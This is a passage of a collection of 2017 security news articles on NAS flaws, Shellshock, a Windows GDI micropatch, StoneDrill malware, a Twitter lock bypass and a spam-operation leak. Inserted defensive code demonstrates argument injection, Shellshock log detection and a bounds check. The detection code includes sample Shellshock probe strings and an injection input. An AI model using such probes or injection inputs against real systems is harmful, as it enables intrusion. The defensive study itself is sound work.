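"""Why escaping a whole command string does not stop argument injection.

Added example (not Western Digital's PHP code or Zenofex's write-up).
escape_cmd_string() is a simplified Python model of PHP's escapeshellcmd():
it backslash-escapes shell metacharacters but, like the real function,
leaves whitespace alone. "login_check" is a placeholder command name.
"""
import shlex
import subprocess
import sys

# Metacharacters escapeshellcmd() neutralises (simplified; quotes handled below).
SHELL_META = set("#&;`|*?~<>^()[]{}$\\\n")


def escape_cmd_string(s):
    """Model of escapeshellcmd(): escape metacharacters and unpaired quotes,
    but do not touch spaces, so the shell will still split on them."""
    out = []
    for ch in s:
        if ch in SHELL_META or (ch in "'\"" and s.count(ch) % 2 == 1):
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def build_vulnerable(username):
    """The flawed pattern: escape the *entire* command string, then hand it
    to a shell. A username containing a space becomes extra arguments."""
    return escape_cmd_string("login_check " + username)


def argv_vulnerable(username):
    """The argv the shell would actually run for build_vulnerable()."""
    return shlex.split(build_vulnerable(username))


def argv_hardened(username):
    """Hardened form: one argv element per argument and no shell in between
    (the PHP equivalent is escapeshellarg() on each argument, or better,
    avoiding the shell entirely). The username stays a single argument."""
    return ["login_check", username]


def count_args_hardened(username):
    """Run a list argv with no shell; the child reports how many arguments it
    received. Python itself stands in for the checker so this runs anywhere."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(len(sys.argv) - 1)", username],
        capture_output=True, text=True, check=True)
    return int(proc.stdout)


if __name__ == "__main__":
    user = "alice --extra-arg"          # constructed input
    print(argv_vulnerable(user))        # ['login_check', 'alice', '--extra-arg']
    print(argv_hardened(user))          # ['login_check', 'alice --extra-arg']
    print(count_args_hardened(user))    # 1
```

The fix for code like wto_check() is therefore not a stricter character filter but passing user-controlled values as discrete arguments (or avoiding a shell call altogether), so the shell never gets a chance to re-tokenise them.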

Users of My Cloud products should note that these are effectively zero-day vulnerabilities with published exploits. Zenofex explained that he has little confidence in Western Digital's willingness to patch the faults rapidly. He pointed out that Szurek mentioned a second bug -- a remote root execution vulnerability as well as the authentication bypass. "Although the reported authentication bypass vulnerability was 'patched'," Zenofex told SecurityWeek, "the fact that the more dangerous of the two bugs has been left unfixed does not give us confidence in the manufacturer."

To this he adds Western Digital's Pwnie award for the Lamest Vendor Response at last summer's Vegas BlackHat. This followed the 2015 discovery that Western Digital's 32-bit encryption key was actually a 4-bit key repeated eight times -- making it very weak. A Western Digital spokesperson said at the time, "We continue to evaluate the observations."

This, Zenofex told SecurityWeek, "eliminates the confidence we have in regards to a manufacturer's ability to properly triage and fix vulnerabilities in their code. It's also important to note that in all our previous research on consumer devices, until researching the My Cloud, we hadn't come across an administrator interface with as many severe security vulnerabilities as that found through our research in this product. To us this signifies a code base that had not properly been audited prior to its use within a retail product as well as programmers who are unaware of safe programming practices."

This is not the first time that Exploiteers have found bugs in patched code. Patches to Samsung SmartCams were revealed in January to be incomplete.

Exploiteers started life in 2011 as GTVHacker, with, explained Zenofex, "the intention to help unlock devices within the GoogleTV platform. These GoogleTV devices were being created by manufacturers and came locked to a specific configuration. The devices would then be abandoned shortly after their launch causing the consumer to buy a new device, sending the old one to the landfill. Our goal was to give the consumers the ability to unlock their devices and repurpose them, preventing the need to purchase another. A few years after our conception, the GoogleTV platform died and we renamed ourselves 'Exploitee.rs'. This fits our new mission statement: hacking everything and therefore creating a better state for online devices."

Western Digital has been invited to respond to Zenofex's exploits and criticisms, and has promised to do so later today. We will update this article as soon as any response is received.


Shellshock Attacks Still Cheap and Easy: IBM

6.3.2017 securityweek Virus

Two and a half years after being discovered, the Shellshock vulnerability continues to be abused in attacks, and for a good reason: it is a very cheap and easy attack, IBM says.

Discovered in September 2014, Shellshock is a vulnerability in the Bourne-again shell (BASH), the default command shell in almost every Linux and Unix system at the time. An attacker able to abuse the security flaw could remotely execute commands with super-user privileges.

Tracked as CVE-2014-6271, the issue was found to affect a great deal of devices, including Web servers and Internet-of-Things (IoT) devices such as DVRs, printers, automotive entertainment systems, routers and even manufacturing systems. Mac OS X systems were also impacted.

With many applications relying on Bash, an attacker could exploit the vulnerability by sending a command sequence to the web server that would be interpreted by Bash. Attacks abusing the security issue were reported immediately after the vulnerability became public knowledge.
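The mechanism just described is what a defender looks for in web-server logs: a request header whose value begins with the Bash function-definition prefix. The following is an added example, not code from the article or from IBM, that parses combined-format access log lines and flags entries carrying that prefix in the Referer or User-Agent field. The log lines at the bottom are constructed for the demonstration; the probe bodies in them are harmless echo statements.

```javascript
// Added example (not from the article or IBM): flag web-server log entries whose
// client-supplied header values start with the Shellshock function-definition
// prefix. The log lines at the bottom are constructed for this demonstration.

// A CGI handler exports request headers such as User-Agent and Referer into the
// environment of the process it spawns. A vulnerable bash, on seeing a variable
// whose value begins with "() {", parses it as a function definition and then
// runs whatever trails the closing brace. No legitimate header starts that way,
// so the prefix alone is a high-confidence indicator.
const SHELLSHOCK_PREFIX = /\(\)\s*\{/;

// Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
const COMBINED_LOG = /^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseCombinedLogLine(line) {
  const m = COMBINED_LOG.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], request: m[3], status: Number(m[4]),
           referer: m[6], user_agent: m[7] };
}

// Return the names of the header fields in one entry that carry the prefix.
function findShellshockFields(entry) {
  return ["referer", "user_agent"].filter((f) => SHELLSHOCK_PREFIX.test(entry[f]));
}

// Scan a whole log text; unparseable lines are skipped rather than treated as alerts.
function scanLog(text) {
  const alerts = [];
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    const entry = parseCombinedLogLine(line);
    if (!entry) continue;
    const fields = findShellshockFields(entry);
    if (fields.length > 0) alerts.push({ ip: entry.ip, request: entry.request, fields });
  }
  return alerts;
}

// Constructed sample traffic: one ordinary browser request, one probe in the
// User-Agent header and one in the Referer header (both with harmless echo bodies).
const SAMPLE_LOG = [
  '192.0.2.10 - - [06/Mar/2017:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
  '192.0.2.11 - - [06/Mar/2017:10:15:07 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"',
  '192.0.2.12 - - [06/Mar/2017:10:15:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; echo probe" "curl/7.29.0"',
].join("\n");

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
}
```

The prefix match is deliberately narrow; a production rule would also inspect any other header a given CGI setup exports, and a hit on a host that has not been patched is the signal to prioritise that host.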

In July 2015, researchers warned that Shellshock was still being abused, and the attacks continue nearly two years later. Many vulnerable devices haven’t been patched to this day, and attackers are enticed to continue hitting those targets.

“Attackers need only a server, basic programming skills and access to malware to carry out this type of attack. The level of knowledge and effort required is quite low. Fraudsters can simply launch attacks against hundreds of different IP addresses per minute and wait to hit a vulnerable server by chance,” IBM’s Joerg Stephan explains.

To carry out a Shellshock attack, an attacker only needs to spend around $5 a month, Stephan says. For just over $30, an attacker could target around 1 million servers within a six-month period, which could translate into 100,000 victims, as roughly 10% of all servers remain unpatched, IBM says.

To set up the attack, an actor would need a web server to host the malicious code, which can be an Apache or lighttpd server. To show how simple the necessary code is, IBM’s researcher published some basic Python code that does the job.

A bash script would download a bot from the server, save it to a certain path, make the file executable and run it; it could also include a line that launches the bot after each reboot, for persistence. Next, the attacker would need to get the target to run that script, which is where Shellshock is exploited.

“With some more scripting effort, you could easily execute the curl statement against a full network range, or even the whole internet, but it will take a while,” the researcher says. In the end, however, the verdict stands: setting up a server to run Shellshock attacks for months is so cheap that the vulnerability continues to be of interest.


Temporary Fix Available for Windows GDI Vulnerability

6.3.2017 securityweek Vulnerability

A temporary fix is available for the Windows Graphics Device Interface (Windows GDI) vulnerability that was disclosed a couple of weeks ago.

The flaw was initially discovered by Mateusz Jurczyk, an engineer with Google's Project Zero team, in March 2016, along with other issues in the user-mode Windows GDI library (gdi32.dll). Microsoft attempted to resolve the bug with its June 2016 patches but failed to do so, and the researcher filed another report in November 2016.

Under Google Project Zero’s policy, vendors have 90 days to resolve disclosed vulnerabilities before they are made public, and this policy applied to the Windows GDI flaw as well. However, because Microsoft did not release its monthly set of security updates in February and pushed the patches to March, the vulnerability was not resolved within the 90-day window.

Tracked as CVE-2017-0038, the vulnerability is related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records. The security researcher who discovered it was able to reproduce the vulnerability both locally (in Internet Explorer) and remotely (in Office Online, using a DOCX file containing a specially crafted EMF file).

Although Microsoft hasn’t released a fix for the issue yet, Luka Treiber with the 0patch Team devised a temporary fix for the issue. For that, the researcher worked with the proof of concept that Google’s Jurczyk published, and says that the issue was visible each time the specially crafted EMF file was loaded in Internet Explorer 11.

“CVE-2017-0038 is a bug in EMF image format parsing logic that does not adequately check image dimensions specified in the image file being parsed against the amount of pixels provided by that file. If image dimensions are large enough the parser is tricked into reading memory contents beyond the memory-mapped EMF file being parsed,” Treiber explains.

By leveraging this vulnerability, an attacker could steal sensitive data that an application holds in memory, or use it as a building block in other attacks that need to defeat Address Space Layout Randomization (ASLR).

The fix for the flaw, the security researcher explains, needs to include a check of whether cbBitsSrc (the size of the source bitmap bits) is smaller than cxSrc * cySrc * 4 (the width of the source rectangle in logical units, times its height in logical units, times the number of bytes representing each pixel). The researcher notes that he first focused on finding the right location for the patch before writing it, so that he could write as little code as possible.
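The check Treiber describes, written out as an added JavaScript example that is not 0patch’s or Microsoft’s code and does not come from the article. The field names follow those the article cites (cbBitsSrc, cxSrc, cySrc) and the 4 bytes per pixel is the figure the article gives; the records are constructed. It also shows the caveat a practitioner would watch for when writing such a check: if the product cxSrc * cySrc * 4 is formed in 32-bit arithmetic, as a C parser naturally would, large dimensions wrap and a naive comparison accepts a record it should reject.

```javascript
// Added example, not 0patch's or Microsoft's code: the bounds check the article
// describes, plus the overflow caveat. Field names follow the article (cbBitsSrc,
// cxSrc, cySrc); the records near the bottom are constructed for this demonstration.

const BYTES_PER_PIXEL = 4; // the article's "number of bytes representing each pixel"

// Emulate the unsigned 32-bit multiplication a C parser would perform:
// Math.imul keeps the low 32 bits of the product, ">>> 0" reads them as unsigned.
function mul32(a, b) {
  return Math.imul(a, b) >>> 0;
}

// Naive check: forms cxSrc * cySrc * 4 in 32-bit arithmetic and compares.
// For large dimensions the product wraps, and a record that claims a huge pixel
// area but supplies almost no pixel bytes passes the comparison.
function naiveCheck(rec) {
  const required = mul32(mul32(rec.cxSrc, rec.cySrc), BYTES_PER_PIXEL);
  return rec.cbBitsSrc >= required;
}

// Safe check: reject non-integer, non-positive dimensions, then test the same
// inequality without forming the full product. cxSrc * 4 stays far below 2^53,
// so it is exact in a double, and the division cannot wrap.
function safeCheck(rec) {
  const { cbBitsSrc, cxSrc, cySrc } = rec;
  if (![cbBitsSrc, cxSrc, cySrc].every(Number.isInteger)) return false;
  if (cxSrc <= 0 || cySrc <= 0 || cbBitsSrc < 0) return false;
  const rowBytes = cxSrc * BYTES_PER_PIXEL;
  // cbBitsSrc >= cxSrc * cySrc * 4  <=>  floor(cbBitsSrc / rowBytes) >= cySrc
  return Math.floor(cbBitsSrc / rowBytes) >= cySrc;
}

// Constructed records (not taken from the proof of concept):
//   wellFormed  claims 16x16 pixels and supplies 1024 bytes, exactly enough.
//   undersized  claims 64x64 pixels but supplies 1024 bytes; a parser that trusts
//               the dimensions reads 15360 bytes beyond the supplied bits, which
//               is the out-of-bounds read the article describes.
//   wrapping    claims 65536x65536 pixels; 65536*65536 is 2^32, which wraps to 0
//               in 32-bit arithmetic, so the naive check is fooled.
const wellFormed = { cxSrc: 16, cySrc: 16, cbBitsSrc: 1024 };
const undersized = { cxSrc: 64, cySrc: 64, cbBitsSrc: 1024 };
const wrapping = { cxSrc: 65536, cySrc: 65536, cbBitsSrc: 1024 };

// Run both checks over the records and report which ones each accepts.
function evaluate() {
  const records = { wellFormed, undersized, wrapping };
  const out = {};
  for (const [name, rec] of Object.entries(records)) {
    out[name] = { naive: naiveCheck(rec), safe: safeCheck(rec) };
  }
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(evaluate());
}
```

The safe variant rearranges the inequality so that no intermediate value can exceed the range of the type it is computed in; in C the same idea is usually expressed as dividing the available byte count by the row size before comparing, or by checking each multiplication against the type’s maximum first.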

The temporary fix for the zero-day Windows GDI issue should already be available on machines with the 0patch Agent installed, because they already have patches ZP-258 through ZP-264, the researcher says. Moreover, he notes that Microsoft’s patch will supersede this fix.

“Note that when Microsoft’s update fixes this issue, it will replace the vulnerable gdi32.dll and our patch will automatically stop getting applied as it is strictly tied to the vulnerable version of the DLL. We have deployed this patch for the following platforms: Windows 10 64bit, Windows 8.1 64bit, Windows 7 64bit and Windows 7 32bit,” the researcher says.

It should also be noted that security vendors have already updated their products to keep them safe from potential attacks attempting to abuse this vulnerability.


Shamoon-Linked "StoneDrill" Malware Allows Spying, Destruction

6.3.2017 securityweek Virus

Researchers at Kaspersky Lab have come across a new and sophisticated piece of malware that can be used for both cyber espionage and wiping an infected computer’s storage.

Dubbed “StoneDrill,” the malware has been linked to the notorious Shamoon 2 and Charming Kitten, aka Newscaster and NewsBeef, a threat actor believed to be located in Iran.

The security firm has observed the threat being used in attacks aimed at entities in Saudi Arabia and one organization in Europe. Unlike in the case of Shamoon, which is known to have caused significant damage to oil giant Saudi Aramco, there are no reports of damaging attacks involving StoneDrill.

Kaspersky Lab discovered StoneDrill using Yara rules created in an effort to identify unknown samples of Shamoon, aka Disttrack. Shamoon and StoneDrill don’t have the same codebase, but researchers said their authors’ programming style and mindset are similar.

While it’s unclear exactly how StoneDrill has been delivered to victims, once it infects a machine, the malware injects itself into the web browser process and uses sophisticated techniques designed for evading security products.

The threat targets both physical and logical drives, and reboots the system once the wipe process is completed. Researchers pointed out that the wiper functionality in StoneDrill has been implemented using a new technique.

Kaspersky has also identified a StoneDrill sample designed to act as a backdoor, likely for espionage operations. Researchers have identified four command and control (C&C) servers used for spying on an unknown number of targets.

While there are similarities between StoneDrill and Shamoon, such as the October-November 2016 sample compilation dates and the fact that both store their payload inside encrypted resources, there are some significant differences. For instance, Shamoon doesn’t use advanced evasion techniques, it doesn’t rely on external scripts, and it leverages drivers instead of memory injections.

Furthermore, StoneDrill uses C&C communications, which allows the attackers to interact with the malware instead of having to use a “kill time” as in the Shamoon attacks.

On the other hand, Kaspersky said StoneDrill seems more similar to a piece of malware used in APT campaigns attributed to Charming Kitten. Researchers discovered similarities in code, C&C naming conventions, backdoor commands and functionality, and Winmain signatures. In fact, StoneDrill appears to be an evolution of Charming Kitten malware.

StoneDrill, Shamoon, Charming Kitten similarities and differences

While it is possible that StoneDrill is just another wiper used by the Shamoon actor, a more likely scenario, according to Kaspersky, is that these are separate groups with largely the same objectives.

“When it comes to artefacts we can say that while Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds mostly Persian resource language sections. Geopolitical analysts would probably be quick to point out that both Iran and Yemen are players in the Iran-Saudi Arabia proxy conflict, and Saudi Arabia is the country where most victims of these operations were found,” explained Kaspersky’s Mohamad Amin Hasbini. “But of course, we do not exclude the possibility of these artefacts being false flags.”

Shamoon, which had been delivered to victims via weaponized documents, has been linked to several groups believed to be operating out of Iran. Symantec reported recently that the threat actor behind the Shamoon attacks may have been aided by the groups tracked as Magic Hound (aka Timberworm and COBALT GYPSY) and Greenbug. These groups have been connected to both Charming Kitten and Rocket Kitten.


Twitter Flaw Allowed Access to Locked Accounts

6.3.2017 securityweek Social

Twitter was until a few months ago affected by a vulnerability that could have been exploited to bypass the social media network’s account locking mechanism.

Twitter can lock user accounts for security purposes if it detects suspicious behavior which could indicate that an account may have been compromised. In order to have the account unlocked, the user needs to confirm they are the legitimate owner by providing some information, such as phone number and email address.

Security expert Aaron Ullger discovered that this account locking mechanism could have been easily bypassed by adding the targeted account to a mobile device. The researcher added the locked account to his iPhone (via the Settings page), installed the Twitter app on the device, and he was given full access to the account.

However, Ullger noticed that the targeted account remained locked on the Twitter website so the bypass had not been complete. In order to achieve a complete bypass, the expert used the iOS Twitter app to access the account’s settings and obtain the email address and phone number needed to unlock the account.

This vulnerability could have been useful for an attacker who had stolen the targeted user’s credentials, but wanted to prevent being locked out of the account.

“An attacker with knowledge of a locked account’s credentials would’ve been able to exploit this issue to gain complete access to the victim’s profile,” Ullger said in a blog post.

The flaw was reported to Twitter on October 7 and it was patched a few days later. The researcher said he received an unspecified bug bounty for his work.

Last year, Ullger also reported finding a way to bypass the password reset initiated by Tumblr following the discovery of a significant data breach.

Twitter has been running a bug bounty program on the HackerOne platform since September 2014. Bug bounty hunters can earn as much as $15,000 for a serious remote code execution vulnerability affecting the company’s core services.

According to its HackerOne page, Twitter has so far received nearly 600 vulnerability reports and it has paid out a total of more than $600,000.


Spammers Leak 1.4 Billion User Records

6.3.2017 securityweek Spam
A company run by a couple of known spammers has unknowingly leaked a series of files containing sensitive information about its operations, including nearly 1.4 billion user records.

River City Media (RCM), which claims to be a legitimate marketing firm, is run by Matt Ferris and Alvin Slocombe, both listed in Spamhaus’ Register of Known Spam Operations (ROKSO).

Slocombe is said to be involved with the bulletproof spam host Cyber World Internet Services, which is believed to have launched spam campaigns using aliases such as Ad Media Plus, RCM Delivery, eBox, Brand 4 Marketing and Site Traffic Network.

MacKeeper researcher Chris Vickery, who has made a name for himself after finding misconfigured databases exposing large amounts of potentially sensitive data, discovered a freely accessible Rsync backup belonging to River City Media.

The leaked data has been analyzed by Vickery, Spamhaus, and IDG’s CSO Online. Law enforcement has also been alerted as some of the exposed files appear to contain evidence of illegal activities. Tech giants such as Microsoft and Apple have also been notified.

According to Vickery, the leaked data includes documents (e.g. financial data), backups and chat logs. One of the most interesting files is a database containing 1.37 billion user records, including names, email addresses, physical addresses and IPs.

The expert, whose investigation showed that much of the data appears to be valid, believes the vast amount of information was collected by the spammers through credit checks, sweepstakes, education opportunities and other similar activities.

“Well-informed individuals did not choose to sign up for bulk advertisements over a billion times. The most likely scenario is a combination of techniques,” Vickery said in a blog post. “One is called co-registration. That’s when you click on the ‘Submit’ or ‘I agree’ box next to all the small text on a website. Without knowing it, you have potentially agreed your personal details can be shared with affiliates of the site.”

The exposed data, which Vickery believes will lead to the downfall of this “spam empire,” also includes information on the illegal tools and techniques used by RCM. For example, one of the leaked files describes a technique leveraged by the spammers to target Gmail servers by opening as many connections as possible between them and the targeted server.

“This is done by purposefully configuring your own machine to send response packets extremely slowly, and in a fragmented manner, while constantly requesting more connections,” the researcher explained. “Then, when the Gmail server is almost ready to give up and drop all connections, the spammer suddenly sends as many emails as possible through the pile of connection tunnels. The receiving side is then overwhelmed with data and will quickly block the sender, but not before processing a large load of emails.”


RDP Tops Email for Ransomware Distribution: Report

6.3.2017 securityweek Virus
The Remote Desktop Protocol (RDP) is an increasingly popular distribution vector among ransomware operators, so popular in fact that it appears to have surpassed email, recent statistics from Webroot suggest.

RDP attacks have been used for the distribution of malware for several years, but they have become a ransomware distribution vector only recently.

Last year, numerous attacks that brute-forced RDP credentials for ransomware distribution were reported, including those involving Bucbi, Apocalypse, and Shade. In May 2016, Fox-IT suggested that RDP was indeed becoming a new infection vector in ransomware attacks, and Kaspersky Lab researchers in September associated the method with the distribution of Xpan in Brazil.

In February 2017, Trend Micro revealed that the Crysis ransomware was being distributed via RDP attacks too. While the method had been employed since September 2016, the number of such attacks doubled in January 2017 when compared to the previous months, the security firm said.

A chart published by Webroot this week shows that RDP is more widespread than email as a ransomware vector: 66% versus 33%. Historically, ransomware has been distributed via other methods as well, including exploit kits and malvertising, but the traffic associated with these vectors does not appear to be as high.

“Over the last couple of months, the data we’ve seen underscores how important it is for system admins to secure RDP. Unsecured RDP essentially leaves the front door open for cybercriminals. And since modern criminals can just encrypt your data, instead of having to go through the trouble of stealing it, we shouldn’t make it any easier for them to get what they want,” the security firm notes.

When it comes to ransomware families that use RDP, Crysis is the most prevalent. At the moment, the variant being distributed appends the “.wallet” extension to encrypted files, but around half a dozen other variants have been observed to date.

Other well-known ransomware families that users should be aware of include Locky, Cerber, CryptoMix and Samas, which emerged over a year ago and continue to wreak havoc. However, newer malware families are also worth taking into consideration, such as Spora, which was first detailed only this year.


CrowdStrike Vs NSS Labs, Round 2: NSS Hits Back

6.3.2017 securityweek Security
In February 2017, endpoint protection firm CrowdStrike took the unusual step of suing independent product testing organization NSS Labs, "to hold it accountable for unlawfully accessing our software, breaching our contract, pirating our software, and improper security testing."

The immediate purpose of the suit was to support action for an injunction to prevent NSS Labs from publishing test result details of CrowdStrike's Falcon endpoint security product within its latest public test. The injunction failed, and NSS published the results.

At the time, NSS Labs issued brief statements but published no lengthy response to CrowdStrike's blogged accusations of 'unlawful conduct' and 'deeply flawed methodology'. Now it has done so.

"Given the serious inaccuracies CrowdStrike has been promoting in their blog and elsewhere, we decided that we needed to tell our side of the story," blogged NSS CEO Vikram Phatak. The blog amounts to a step-by-step refutation of CrowdStrike's accusations.

Where CrowdStrike claims the tests are incomplete (it disconnected its cloud-based Falcon before the tests were complete) and the results therefore invalid, NSS claims that CrowdStrike's results were not penalized. "CrowdStrike did not receive a zero (0) for the parts of the test we were unable to complete - because we believed that penalizing CrowdStrike for disabling the product could mislead the public." It also points out that Falcon had missed various attacks before the disconnection, and that those attacks would remain missed whether the full testing had been completed or not.

A primary thrust of CrowdStrike's arguments is that it had "declined to participate in a public test after completing a private test with NSS, based on NSS' flawed and improper testing execution."

The NSS response is that it is not open for individual companies to withdraw from a public test. "NSS Labs informed CrowdStrike that our position, as always, is that if a product is good enough to sell to the public, it is good enough to be tested and that we would purchase their product if necessary." NSS tried to buy the product, was blocked by CrowdStrike, but "found an enterprise who would be willing to work with us to purchase the product."

CrowdStrike Falcon was subsequently part of the NSS public tests, but failed to complete because CrowdStrike disconnected it from its cloud before completion.

It is an unsightly squabble; but one that has been threatening for many months. Next-gen endpoint protection firms have tended to claim that the in situ anti-virus products do not work. Those 'legacy' firms have responded that independent testing would settle the issue. To begin with, next-gens replied that their products could not be tested in the same way as legacy products (and it should be said that they had a point).

The testing laboratories, however, have spent considerable time and effort in improving their testing techniques specifically for next-gens -- and many next-gens are now happy to take part. Three other next-gen products included in the same tests did rather well: Cylance at 99.69%, SentinelOne at 99.79%, and Invincea at 99.49%. CrowdStrike did less well at 74.17%.

Anup Ghosh, founder and CEO at Invincea, accepts that there have been difficulties in testing, but believes that cooperation rather than withdrawal is the answer. "We are really excited about how well we did in the NSS Labs AEP test," he told SecurityWeek. "We won't comment on competitors or competitors' behavior. I think you know our stance on third party testing: it should be done early and often and with multiple reputable third party testers. NSS Labs does a good job in 'real world' exploits and evasions techniques, but every test shop has its pros and cons. That's why we try to participate in as many public reputable third party tests as possible."

SecurityWeek approached CrowdStrike for a response to the NSS blog, but has not received a reply.


A bug in Twitter allowed hackers to access to locked accounts until October
6.3.2017 securityaffairs Crime

A flaw in Twitter allowed attackers to access locked accounts by bypassing the locking mechanism implemented by the company.
A flaw in the Twitter application allowed, until a few months ago, access to locked accounts by bypassing the locking mechanism implemented by the IT giant.
Twitter can lock user accounts whenever it believes the users are abusing its services for activities not allowed by the usage policy, or for security reasons, if the company identifies suspicious behavior which could indicate that an account may have been hacked.

In order to unlock the account, the owner needs to confirm their identity by providing some information, such as the email address and the phone number.

Twitter locked accounts bypass

The security expert Aaron Ullger devised a method to bypass the Twitter account locking mechanism by adding the targeted account to a mobile device.
“I recently found a flaw in the lockout mechanism Twitter has in place to protect accounts from unauthorized access. This flaw resulted in a complete bypass of the verification page which is presented to users if their account is locked.” reads the post published by Ullger.

The researcher added the locked Twitter account to his iPhone via the mobile Settings page; it was then enough to install the Twitter app on the device to get full access to the account.

Ullger explained that even with this procedure the account remained locked on the Twitter website. To complete the bypass, the attacker needs to retrieve the information required to unlock it. To achieve this, Ullger used the iOS Twitter app to access the account’s settings and obtain the email address and phone number of the account’s legitimate owner. At this point, the attacker can unlock the locked Twitter account by going through the official verification procedure.

“After some more failed attempts, I remembered that it was possible to add your Twitter account to your iPhone through device settings,” wrote the expert. “The settings option for Twitter (which allows you to add/remove Twitter accounts) is present on your phone even if you’ve never installed the Twitter app before. I was able to add my locked Twitter account to my device through settings without any problems.”

The researcher highlighted that exploiting the flaw was useful to an attacker who had stolen the targeted user’s credentials and wanted to avoid being locked out of the account.

“I was then able to submit this information on the verification page I was previously displayed, which allowed me to login to the desktop Twitter site as well. The locked flag was then completely removed from my account.” Ullger wrote in a blog post.

“An attacker with knowledge of a locked account’s credentials would’ve been able to exploit this issue to gain complete access to the victim’s profile.”

Below the timeline of the vulnerability:

Oct 7, 2016 – Report sent
Oct 7, 2016 – Report triaged by Twitter
Oct 11, 2016 – Issue marked as fixed, report resolved by Twitter
Oct 14, 2016 – Bounty awarded
The flaw was reported to Twitter on October 7 and it was patched a few days later. The researcher said he received an unspecified bug bounty for his work.

Twitter launched a bug bounty program in 2014; it runs on the HackerOne platform, and bug hunters can earn up to $15,000 for the most severe issues.

Since 2014, Twitter has paid out a total of more than $600,000 for 600 vulnerabilities.


The total potential loss for financial services globally is estimated at £8 billion
6.3.2017 securityaffairs Crime

Researchers at ThreatMetrix observed that online financial services and lending companies were the most targeted by crooks in 2016.
Online financial services, lending companies and alternative payment systems are prime targets for threat actors. According to researchers at the security firm ThreatMetrix, the number of cyber attacks against online lending companies and alternative payment systems increased by 122% in 2016.

Cyber attacks against financial services cost consumers £8bn in 2016; the significant increase is tied to customers’ growing use of online financial services.

“Due to its surge in popularity, and fast transaction cycles, online lending has become a prime target for cyber criminals,” explained Vanita Pandey, vice president of strategy at ThreatMetrix. “Online lenders are under increasing pressure to adopt smarter authentication methods to accelerate genuine loans and prevent fraud.”

Consider that the number of online financial services transactions in the UK grew by 10% in 2016.

The number of attacks targeting alternative lending has increased by 150% since Q3 2016.

The vast majority of attacks against financial services last year relied on fake or stolen credentials; ThreatMetrix detected 80 million such attacks.

Identity theft was the most common crime in the UK last year; the data available from the numerous breaches allowed crooks to launch an impressive number of attacks.

According to the latest ThreatMetrix Cybercrime Report, new countries are appearing on the cybercrime front lines: the majority of fraudulent activity originated in developing nations, including Brazil, Egypt, Ghana, Jordan, Nigeria and Macedonia.

“Brazil emerged in Q4 as a major attack destination, and ThreatMetrix saw a significant increase in attacks coming from emerging economies, including Tunisia, Ukraine, Malaysia, Bangladesh, Pakistan, Serbia, Morocco, Guadeloupe, Qatar and Cuba. Identity spoofing is the leading attack vector in such economies.” reads the report.

Below further key findings from the report:

Nearly 122 million attacks were detected and stopped in real-time, an increase of more than 35% over the previous year.
Growth in attacks outpaced overall transaction growth, and the overall rejected transaction rate grew 15% — demonstrating heightened risk levels.
45% of transactions now come from mobile devices, rising to 55% in financial services, as users log in almost daily to check their bank balance via mobile apps. Mobile devices are increasingly becoming the primary conduit for transacting online, with businesses moving from digital-first strategies to mobile-first ones.
Mobile-only users have increased across all industry groups, rising to 40% in financial services. For a sizable minority, desktops are becoming obsolete, as the breadth and depth of mobile products and services stretches to allow mobile-only usage.
Cross-border transactions are growing in prevalence; more than a quarter of transactions in the network are now cross border, but these continue to be approached with caution and are rejected more than twice as much as domestic transactions.


Chris Vickery announced a 1.37 billion records data leak to disclose on Monday
6.3.2017 securityaffairs Crime

The popular security researcher Chris Vickery announced that he will shortly reveal the source of a massive data leak. What is the source?
The popular cyber security expert Chris Vickery of security firm MacKeeper announced that he will shortly reveal the source of a huge data breach affecting individuals.

Chris Vickery (@VickerySec) tweeted at 11:44 PM on 3 Mar 2017: “1.4 billion identity leak story incoming Monday morning. Thanks go to @SteveD3 (and someone else) for cooperating on investigation.”

Vickery also offered a teaser of the leak, which also reduced the number of identities by 30,000.

In a second tweet, at 3:22 AM on 4 Mar 2017, Vickery posted a teaser screenshot of the database’s summary data.
Security experts are speculating about the identity of the alleged victim of the data breach; the sheer amount of data restricts the list of candidates.

One name circulating online is Aadhaar, the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017. It includes data from more than 99% of Indians aged 18 and above.

“The data is collected by the Unique Identification Authority of India (UIDAI), a statutory authority established on 12 July 2016 by the Government of India, under the Ministry of Electronics and Information Technology, under the provisions of the Aadhaar Act 2016.”

The Indian Government promptly denied that the database belongs to the Aadhaar system.

“In a comprehensive clarification with regard to misinformation in some news items and articles appearing in various print and social media during the last few days alleging breach of Aadhaar data, misuse of biometrics, breach of privacy, and creation of parallel databases etc., UIDAI said that it has carefully gone into these reports and would like to emphasise that there has been no breach to UIDAI database of Aadhaar in any manner whatsoever and personal data of individuals held by UIDAI is fully safe and secure.” reads the official statement issued by the UIDAI.

“In a statement, UIDAI has said that Aadhaar based authentication is robust and secure as compared to any other contemporary systems. Aadhaar system has the capability to inquire into any instance of misuse of biometrics and identity theft and initiate action.”

Another hypothesis on the origin of the huge trove is China, the only other country with an archive that large (1.37bn identities). That brings us to other candidates, namely:

Looking at the private sector, a limited number of companies have databases of a similar size.

Facebook, WhatsApp, Apple, Microsoft, Yahoo, the Chinese WeChat and the Tencent platforms IM QQ and social network Qzone.

El Reg also speculated about the involvement of a data harvesting company.

“The likes of Oracle, Salesforce and Wayin have colossal databases of individuals and businesses they sell to marketers and others, and claim to have hundreds of millions of records. Can’t be discounted.” reads El Reg.

Whoever it is, the data leak highlights the poor level of security of databases exposed online.

Chris Vickery has discovered many other high-profile cases of open databases exposed on the Internet. In December 2015 the security expert found 191 million records belonging to US voters online, and in April 2016 he discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

